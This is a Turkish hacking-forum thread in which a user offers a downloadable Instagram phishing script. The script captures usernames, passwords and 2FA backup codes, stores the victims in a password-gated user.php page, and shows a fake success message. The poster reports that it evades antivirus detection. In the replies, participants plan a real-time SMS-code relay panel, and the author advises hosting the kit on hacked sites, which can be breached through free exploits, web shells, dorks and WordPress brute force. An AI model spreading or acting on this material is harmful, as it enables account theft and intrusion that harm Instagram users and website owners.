İnstagram Fake Login Scripti | 2Fa bypass'lı/Açık kaynak|

'CaptainKanka

'CaptainKanka

O Şimdi Asker!
14 Eki 2012
1,683
1,261
localhost/admin.php

66e2lra.jpg


Merhaba dostlar

Bu gün sizlere bu konumdaki scriptim silindiği için ve php uyumları sorunu yaşadığı için yeni versiyonunu paylaşma gereği duydum.

Scriptin çalışma mantığından bahsedecek olursak kullanıcı adı ve şifrelerin girilmesinin ardından 2fa kodu ister ve bypass kısmı burada olur. Kullanıcının yedek kodlarından birinin burada girilmesi istenir.

Yedek kodlarına nasıl ulaşacağı yine bu sayfada yazılıdır.Aslında tam olarak bypass denilemez ama bu işleme başka bir isim bulamadım :)

Yedek kodlardan birisi girildikten sonra devam edilerek işlem tamamlanır ve kullanıcının karşısına "Geri bildiriminiz başarıyla gerçekleşti. Anasayfa'ya yönlendirilmek için tıklayın." yazısı çıkar ve instagramın anasayfasına yönlendirir.

Kayıtlarımız ise user.php'de tutulur.

user.php'ye ulaşmak içinse ilk olarak user.php'nin içinde en yukarıdaki

PHP: 
<?php
      error_reporting(0);
      session_start();
        if (!$_GET["sifre"] or $_GET["sifre"]!="sifreniz") {
          exit();
        }

       ?>

kısmındaki "sifreniz" kısmına istediğiniz şifreyi koyabilirsiniz. örneğin 123 şifresini koyacaksam

PHP: 
<?php

      error_reporting(0);

      session_start();

        if (!$_GET["sifre"] or $_GET["sifre"]!="123") {

          exit();

        }

       ?>
şeklinde yapıyoruz ve kaydediyoruz. Ardından kayıtlı userlara ulaşmak için siteadınız.com/user.php?sifre=123 e tıklıyoruz. Böylelikle gelen get parametreli verimizdeki sifre değişkenine şifreyi yazıp userleri ekrana bastırmış oluyoruz.

Scriptimizden görüntüler

Anasayfa



2Fa Alanı



Başarılı İşlem Mesajı

Userlerin sergilendiği alan


İndirme Linki

Virüs Total-0/59 [25/11/2023]
66e2lra.jpg
 
Proxq_

Proxq_

Üye
29 Mar 2023
91
31
Proxq_
'CaptainKanka' Alıntı:

66e2lra.jpg


Merhaba dostlar

Bu gün sizlere bu konumdaki scriptim silindiği için ve php uyumları sorunu yaşadığı için yeni versiyonunu paylaşma gereği duydum.

Scriptin çalışma mantığından bahsedecek olursak kullanıcı adı ve şifrelerin girilmesinin ardından 2fa kodu ister ve bypass kısmı burada olur. Kullanıcının yedek kodlarından birinin burada girilmesi istenir.

Yedek kodlarına nasıl ulaşacağı yine bu sayfada yazılıdır.Aslında tam olarak bypass denilemez ama bu işleme başka bir isim bulamadım :)

Yedek kodlardan birisi girildikten sonra devam edilerek işlem tamamlanır ve kullanıcının karşısına "Geri bildiriminiz başarıyla gerçekleşti. Anasayfa'ya yönlendirilmek için tıklayın." yazısı çıkar ve instagramın anasayfasına yönlendirir.

Kayıtlarımız ise user.php'de tutulur.

user.php'ye ulaşmak içinse ilk olarak user.php'nin içinde en yukarıdaki

PHP: 
<?php
      error_reporting(0);
      session_start();
        if (!$_GET["sifre"] or $_GET["sifre"]!="sifreniz") {
          exit();
        }

       ?>

kısmındaki "sifreniz" kısmına istediğiniz şifreyi koyabilirsiniz. örneğin 123 şifresini koyacaksam

PHP: 
<?php

      error_reporting(0);

      session_start();

        if (!$_GET["sifre"] or $_GET["sifre"]!="123") {

          exit();

        }

       ?>
şeklinde yapıyoruz ve kaydediyoruz. Ardından kayıtlı userlara ulaşmak için siteadınız.com/user.php?sifre=123 e tıklıyoruz. Böylelikle gelen get parametreli verimizdeki sifre değişkenine şifreyi yazıp userleri ekrana bastırmış oluyoruz.

Scriptimizden görüntüler

Anasayfa



2Fa Alanı



Başarılı İşlem Mesajı

Userlerin sergilendiği alan


İndirme Linki

Virüs Total-0/59 [25/11/2023]
66e2lra.jpg
Genişletmek için tıkla ...
Eline sağlık
 
Tdark

Tdark

Katılımcı Üye
9 Ağu 2019
403
22
elinize sağlık biraz daha geliştirilebilir, kodlar size mi ait
 
Tdark

Tdark

Katılımcı Üye
9 Ağu 2019
403
22
'CaptainKanka' Alıntı:
temanın çoğu @akovskiniz e aittir. ben geliştirip 2fa ekleyip biraz daha fonksiyonel hale getirdim. Geliştirmek için bir fikriniz mi var?
Genişletmek için tıkla ...
evet aslında var bu arlar panelli script yapmaya çalışıyorum eğer yapabilirsem konu açacağım yorumunuzu beklerim, aklımdaki fikir görsel olarak biraz metaya benzeyecek ve bir panel eklemek o panelde girilen kişi (kurban) sayısı ip ban şif kullanıcı gibi yer alacak 2f gelince sms gönder butonu olacak tabi sms biz göndermicez sms gönder dediğimiz zaman ekranda biraz bekletecek karşı tarafa kod gittiği zaman ekranı açacağız ve kodu yazacak, biraz karmaşık anlatmış olabilirim
 
'CaptainKanka

'CaptainKanka

O Şimdi Asker!
14 Eki 2012
1,683
1,261
localhost/admin.php
Tdark' Alıntı:
evet aslında var bu arlar panelli script yapmaya çalışıyorum eğer yapabilirsem konu açacağım yorumunuzu beklerim, aklımdaki fikir görsel olarak biraz metaya benzeyecek ve bir panel eklemek o panelde girilen kişi (kurban) sayısı ip ban şif kullanıcı gibi yer alacak 2f gelince sms gönder butonu olacak tabi sms biz göndermicez sms gönder dediğimiz zaman ekranda biraz bekletecek karşı tarafa kod gittiği zaman ekranı açacağız ve kodu yazacak, biraz karmaşık anlatmış olabilirim
Genişletmek için tıkla ...
sms tarafıda basit yapılırda bu panel tarafı için o kadar uğraşmaya değermi çünkü bu scriptte işimizi görür. Ama o tarafta takılırsanız yardımcı olurum. Zaten bu scripti kullanacak olursam muhtemelen free host yerine hacklenmiş bir site üstüne kurarım ve kurulumuda basit olur. panelde birde mysql tarafına girersek kurulumu dahada çok yoracaktır. ama istek olursa sizin dediğiniz gibide geliştirebilirim.
 
Tdark

Tdark

Katılımcı Üye
9 Ağu 2019
403
22
'CaptainKanka' Alıntı:
sms tarafıda basit yapılırda bu panel tarafı için o kadar uğraşmaya değermi çünkü bu scriptte işimizi görür. Ama o tarafta takılırsanız yardımcı olurum. Zaten bu scripti kullanacak olursam muhtemelen free host yerine hacklenmiş bir site üstüne kurarım ve kurulumuda basit olur. panelde birde mysql tarafına girersek kurulumu dahada çok yoracaktır. ama istek olursa sizin dediğiniz gibide geliştirebilirim.
Genişletmek için tıkla ...
bu tarz şeylere düşen var mı artık bilmiyorum uzun zaman önce uğraşıyordum şimdi kendimce kişisel tasarımlar yapıyorum. gelişmem için önerebileceğiniz bir yol var mı ve instagram phishing için hangi hostu kullanıyorsun veya hacklenmiş site nerden buluyorsun
 
Endarion

Endarion

Katılımcı Üye
29 Ağu 2021
890
519
Righteous Side of Hell
Tdark' Alıntı:
evet aslında var bu arlar panelli script yapmaya çalışıyorum eğer yapabilirsem konu açacağım yorumunuzu beklerim, aklımdaki fikir görsel olarak biraz metaya benzeyecek ve bir panel eklemek o panelde girilen kişi (kurban) sayısı ip ban şif kullanıcı gibi yer alacak 2f gelince sms gönder butonu olacak tabi sms biz göndermicez sms gönder dediğimiz zaman ekranda biraz bekletecek karşı tarafa kod gittiği zaman ekranı açacağız ve kodu yazacak, biraz karmaşık anlatmış olabilirim
Genişletmek için tıkla ...
Yani demek istediğin, 2fa kodu girildiğinde otomatik olarak selenium ile instagrama giriş yapan bir script sanırım. Eğer öyle ise mantıklı, çümkü al bir tane google ads hesabı reklam ver sonra bak keyfine. Yapılabilir.

Bu arada eline sağlık @'CaptainKanka . Güzel script olmuş.
 
'CaptainKanka

'CaptainKanka

O Şimdi Asker!
14 Eki 2012
1,683
1,261
localhost/admin.php
Tdark' Alıntı:
bu tarz şeylere düşen var mı artık bilmiyorum uzun zaman önce uğraşıyordum şimdi kendimce kişisel tasarımlar yapıyorum. gelişmem için önerebileceğiniz bir yol var mı ve instagram phishing için hangi hostu kullanıyorsun veya hacklenmiş site nerden buluyorsun
Genişletmek için tıkla ...
site hackleyemiyorsan free exploitler veya fresh sheller bulup oradan hacklenen sunuculara veya piyasada kullanılan shelleri dorklarla aratarak veya wp brute deneyerek sitelere sızabilirsin. Tasarım tarafında bootstrap öğrenmelisin ve hover gibi efektlerde kendini geliştirip amazing slider ile slider çıkartıp kaynak kodlarını inceleyebilirsin. sonrasında bootstrap studio ile hazır temalar oluşturup efektler verip kaynak kodda nasıl yapıldığına bakabilirsin. Sonrasında tasarımda ilerleyeceksen tailwind vs devam edersin.
Endarion' Alıntı:
Yani demek istediğin, 2fa kodu girildiğinde otomatik olarak selenium ile instagrama giriş yapan bir script sanırım. Eğer öyle ise mantıklı, çümkü al bir tane google ads hesabı reklam ver sonra bak keyfine. Yapılabilir.

Bu arada eline sağlık @'CaptainKanka . Güzel script olmuş.
Genişletmek için tıkla ...
aslında bu otomatize işlemini seleniuma kalmadan yapabiliyorsun ama baya uğraştırıcı ve hazır yapılıları loglu. ve o tarz bir script çok çabuk patlıyor adam bi sayfayı oynuyor tüm sistem pert otur bida yaz :LOL:
teşekkürler
 
V

Volkan.

Yeni üye
16 Kas 2023
20
4
'CaptainKanka' Alıntı:

66e2lra.jpg


Merhaba dostlar

Bu gün sizlere bu konumdaki scriptim silindiği için ve php uyumları sorunu yaşadığı için yeni versiyonunu paylaşma gereği duydum.

Scriptin çalışma mantığından bahsedecek olursak kullanıcı adı ve şifrelerin girilmesinin ardından 2fa kodu ister ve bypass kısmı burada olur. Kullanıcının yedek kodlarından birinin burada girilmesi istenir.

Yedek kodlarına nasıl ulaşacağı yine bu sayfada yazılıdır.Aslında tam olarak bypass denilemez ama bu işleme başka bir isim bulamadım :)

Yedek kodlardan birisi girildikten sonra devam edilerek işlem tamamlanır ve kullanıcının karşısına "Geri bildiriminiz başarıyla gerçekleşti. Anasayfa'ya yönlendirilmek için tıklayın." yazısı çıkar ve instagramın anasayfasına yönlendirir.

Kayıtlarımız ise user.php'de tutulur.

user.php'ye ulaşmak içinse ilk olarak user.php'nin içinde en yukarıdaki

PHP: 
<?php
      error_reporting(0);
      session_start();
        if (!$_GET["sifre"] or $_GET["sifre"]!="sifreniz") {
          exit();
        }

       ?>

kısmındaki "sifreniz" kısmına istediğiniz şifreyi koyabilirsiniz. örneğin 123 şifresini koyacaksam

PHP: 
<?php

      error_reporting(0);

      session_start();

        if (!$_GET["sifre"] or $_GET["sifre"]!="123") {

          exit();

        }

       ?>
şeklinde yapıyoruz ve kaydediyoruz. Ardından kayıtlı userlara ulaşmak için siteadınız.com/user.php?sifre=123 e tıklıyoruz. Böylelikle gelen get parametreli verimizdeki sifre değişkenine şifreyi yazıp userleri ekrana bastırmış oluyoruz.

Scriptimizden görüntüler

Anasayfa



2Fa Alanı



Başarılı İşlem Mesajı

Userlerin sergilendiği alan


İndirme Linki

Virüs Total-0/59 [25/11/2023]
66e2lra.jpg
Genişletmek için tıkla ...
Eline sağlık
 
bayoyunsultanı

bayoyunsultanı

Katılımcı Üye
24 Kas 2023
273
98
Kaiserreich
'CaptainKanka' Alıntı:

66e2lra.jpg


Merhaba dostlar

Bu gün sizlere bu konumdaki scriptim silindiği için ve php uyumları sorunu yaşadığı için yeni versiyonunu paylaşma gereği duydum.

Scriptin çalışma mantığından bahsedecek olursak kullanıcı adı ve şifrelerin girilmesinin ardından 2fa kodu ister ve bypass kısmı burada olur. Kullanıcının yedek kodlarından birinin burada girilmesi istenir.

Yedek kodlarına nasıl ulaşacağı yine bu sayfada yazılıdır.Aslında tam olarak bypass denilemez ama bu işleme başka bir isim bulamadım :)

Yedek kodlardan birisi girildikten sonra devam edilerek işlem tamamlanır ve kullanıcının karşısına "Geri bildiriminiz başarıyla gerçekleşti. Anasayfa'ya yönlendirilmek için tıklayın." yazısı çıkar ve instagramın anasayfasına yönlendirir.

Kayıtlarımız ise user.php'de tutulur.

user.php'ye ulaşmak içinse ilk olarak user.php'nin içinde en yukarıdaki

PHP: 
<?php
      error_reporting(0);
      session_start();
        if (!$_GET["sifre"] or $_GET["sifre"]!="sifreniz") {
          exit();
        }

       ?>

kısmındaki "sifreniz" kısmına istediğiniz şifreyi koyabilirsiniz. örneğin 123 şifresini koyacaksam

PHP: 
<?php

      error_reporting(0);

      session_start();

        if (!$_GET["sifre"] or $_GET["sifre"]!="123") {

          exit();

        }

       ?>
şeklinde yapıyoruz ve kaydediyoruz. Ardından kayıtlı userlara ulaşmak için siteadınız.com/user.php?sifre=123 e tıklıyoruz. Böylelikle gelen get parametreli verimizdeki sifre değişkenine şifreyi yazıp userleri ekrana bastırmış oluyoruz.

Scriptimizden görüntüler

Anasayfa



2Fa Alanı



Başarılı İşlem Mesajı

Userlerin sergilendiği alan


İndirme Linki

Virüs Total-0/59 [25/11/2023]
66e2lra.jpg
Genişletmek için tıkla ...
hocam 2fa bypass + passwordmu buluyor sadece bypassmi?
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.